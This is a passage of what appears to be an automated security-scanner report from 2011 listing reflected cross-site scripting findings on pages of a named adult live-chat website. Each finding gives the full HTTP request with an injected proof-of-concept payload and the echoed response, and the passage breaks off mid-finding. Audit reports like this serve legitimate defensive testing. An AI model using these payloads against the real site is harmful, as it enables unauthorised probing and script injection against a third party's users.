Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:44 GMT
Connection: close
Content-Length: 40363
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/?66ff1"><a>7cdd9e5718=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.496. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a1f'-alert(1)-'124e919064e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 25778
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.497. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb3b0"><a>47d9b6a6eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 25631
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.498. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d13a5'-alert(1)-'167550feeda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:10 GMT
Connection: close
Content-Length: 225335
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.499. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d76ad"><a>13636193c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:35 GMT
Connection: close
Content-Length: 226523
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1">
...[SNIP]...

4.500. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145d0'-alert(1)-'7c612653421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:19 GMT
Connection: close
Content-Length: 27791
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

4.501. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b83"><a>3293a7e18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:10 GMT
Connection: close
Content-Length: 27644
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.502. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f55"><a>53aa4db76a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 33620
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.503. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1145a'-alert(1)-'9eeece25a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 33767
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.504. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

